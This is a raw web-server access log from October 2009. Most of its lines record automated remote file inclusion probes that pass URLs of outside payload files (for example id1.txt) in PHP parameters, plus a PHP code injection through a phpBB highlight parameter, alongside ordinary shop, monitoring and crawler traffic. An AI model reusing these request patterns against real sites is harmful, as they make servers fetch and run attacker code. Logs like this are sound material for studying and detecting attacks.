114.108.177.238 - - [28/Oct/2009:00:58:02 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:58:02 -0400] "GET /logs/access_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:58:11 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:58:11 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:58:11 -0400] "GET /logs/access_log.Q109070200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:58:19 -0400] "GET /logs/error_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:00:58:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.108.177.238 - - [28/Oct/2009:00:58:28 -0400] "GET /logs/error_log.Q109070200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.201.180.130 - - [28/Oct/2009:00:58:30 -0400] "GET /logs/access_log.Q109052900/phphtml.php?htmlclass_path=http://www.animalmedia.org//plugins/system/pwalb.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
200.201.180.130 - - [28/Oct/2009:00:58:33 -0400] "GET /logs/access_log.Q109052900/phphtml.php?htmlclass_path=http://www.animalmedia.org//plugins/system/pwalb.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
213.171.225.234 - - [28/Oct/2009:00:58:40 -0400] "GET //?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.171.225.234 - - [28/Oct/2009:00:58:40 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.171.225.234 - - [28/Oct/2009:00:58:40 -0400] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:00:58:45 -0400] "GET /logs/index.php?meio=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:00:58:45 -0400] "GET /index.php?meio=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:00:58:45 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.27.196.133 - - [28/Oct/2009:00:59:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG HTTP/1.1" 200 60854 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682424_THUMB.JPG HTTP/1.1" 200 1879 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682400_THUMB.JPG HTTP/1.1" 200 1790 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682425_THUMB.JPG HTTP/1.1" 200 2075 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682427_THUMB.JPG HTTP/1.1" 200 1879 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682428_THUMB.JPG HTTP/1.1" 200 2075 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:11 -0400] "GET /images/items/682426_THUMB.JPG HTTP/1.1" 200 2066 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:12 -0400] "GET /images/items/682431_THUMB.JPG HTTP/1.1" 200 1417 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:12 -0400] "GET /images/items/682429_THUMB.JPG HTTP/1.1" 200 2066 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:12 -0400] "GET /images/items/682430_THUMB.JPG HTTP/1.1" 200 1417 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG HTTP/1.1" 200 51833 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
114.108.177.238 - - [28/Oct/2009:00:59:32 -0400] "GET /logs/public%A7includes/pub%A7blocks/activecontent.php?vsDragonRootPath=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:33 -0400] "GET /logs/access_log.Q109062200/public%A7includes/pub%A7blocks/activecontent.php?vsDragonRootPath=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:33 -0400] "GET /public%A7includes/pub%A7blocks/activecontent.php?vsDragonRootPath=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:59:43 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:43 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:43 -0400] "GET /logs/error_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:43 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.27.196.133 - - [28/Oct/2009:00:59:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG HTTP/1.1" 200 60135 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:59:45 -0400] "GET /images/items/1151265_THUMB.JPG HTTP/1.1" 200 1309 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2F561AB08500CBD908K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
114.108.177.238 - - [28/Oct/2009:00:59:47 -0400] "GET /logs/error_log.Q109070600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:59:57 -0400] "GET /logs/access_log.Q109062900/public%A7includes/pub%A7blocks/activecontent.php?vsDragonRootPath=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:01:00:03 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/access_log.Q109081800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.238.2.226 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/access_log.Q109062300%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/access_log.Q109081800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/access_log.Q109081800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.238.2.226 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/access_log.Q109081000%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
67.195.110.164 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.110.164 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.110.164 - - [28/Oct/2009:05:12:35 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.110.164 - - [28/Oct/2009:05:12:36 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.223.201.177 - - [28/Oct/2009:05:13:05 -0400] "GET /logs/access_log.Q109101200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:05 -0400] "GET /logs/access_log.Q109101200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:11 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:11 -0400] "GET /logs/access_log.Q109081800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:11 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:13 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:13 -0400] "GET /logs/access_log.Q109081800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:13:13 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:14 -0400] "GET /logs/access_log.Q109101200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:35 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:35 -0400] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:35 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:13:37 -0400] "GET /logs/error_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:13:39 -0400] "GET //Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:13:39 -0400] "GET /logs//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:13:39 -0400] "GET /logs/access_log.Q109093000//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.234.2.106 - - [28/Oct/2009:05:13:39 -0400] "GET /logs/access_log.Q109082600//Neos_Chronos/header.php?base_folder=http://sledink.fileave.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:10 -0400] "GET /logs/access_log.Q109101200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:10 -0400] "GET /logs/access_log.Q109101200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:05:14:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.96.111.133 - - [28/Oct/2009:05:14:38 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:38 -0400] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:38 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:43 -0400] "GET /logs/error_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:14:49 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:14:49 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:14:49 -0400] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:52 -0400] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:52 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:52 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:14:56 -0400] "GET /logs/error_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:14:58 -0400] "GET /logs/error_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:08 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:08 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:08 -0400] "GET /logs/access_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:13 -0400] "GET /logs/error_log.Q109100300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:52 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:15:57 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:16:01 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:16:02 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:16:10 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:16:10 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.252.90.80 - - [28/Oct/2009:05:16:47 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
203.252.90.80 - - [28/Oct/2009:05:16:47 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
203.252.90.80 - - [28/Oct/2009:05:16:48 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
